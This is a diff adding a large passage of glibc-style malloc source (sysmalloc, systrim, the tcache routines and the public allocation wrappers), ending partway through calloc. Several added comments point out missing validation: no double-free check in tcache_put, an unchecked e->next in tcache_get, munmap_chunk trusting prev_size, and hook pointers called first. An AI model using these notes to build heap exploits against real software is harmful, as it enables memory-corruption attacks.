+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use mmap to get memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes a size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If we have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for the fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so we must add to the 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If we can't allocate the correction, try to at least find out
+                     the current brk.  It might be enough to proceed without failing.
+
+                     Note that if the second sbrk did NOT fail, we assume that space
+                     is contiguous with the first sbrk. This is a safe assumption unless
+                     the program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore the MORECORE return value
+         and instead call again to find out where the new end of memory is.
+         This avoids problems if the first call releases less than we asked,
+         or if failure somehow altered the brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (at the moment, at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
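+
+/* Note that munmap_chunk trusts prev_size (p) to locate the start of the
+   mapping; the only validation is the page-alignment test above on the
+   combined block address and total size.  */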
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time); this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
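+
+/* Layout note: a tcache_entry is overlaid on the user data of a free
+   chunk, so its next pointer occupies the bytes that would hold fd for
+   a chunk in an ordinary bin.  The tcache_perthread_struct itself is
+   obtained from _int_malloc in tcache_init below, so it lives on the
+   heap like any other allocation; with the default TCACHE_MAX_BINS of
+   64 it holds 64 one-byte counts plus 64 pointers and is typically the
+   first chunk created for a thread.  */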
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there are
+   chunks available to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  return (void *) e;
+}
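+
+/* Neither routine above validates its input beyond the asserts:
+   tcache_put does not check whether the chunk is already present in the
+   bin (the e->key based double-free detection only appeared in glibc
+   2.29), and tcache_get follows e->next without any further check.  */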
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
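+/* The public wrappers below first consult the corresponding hook
+   pointer (__malloc_hook, __free_hook, __realloc_hook, __memalign_hook),
+   read with atomic_forced_read; when a hook is set it is called with the
+   request and the caller's return address before any other processing.  */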
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wraps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
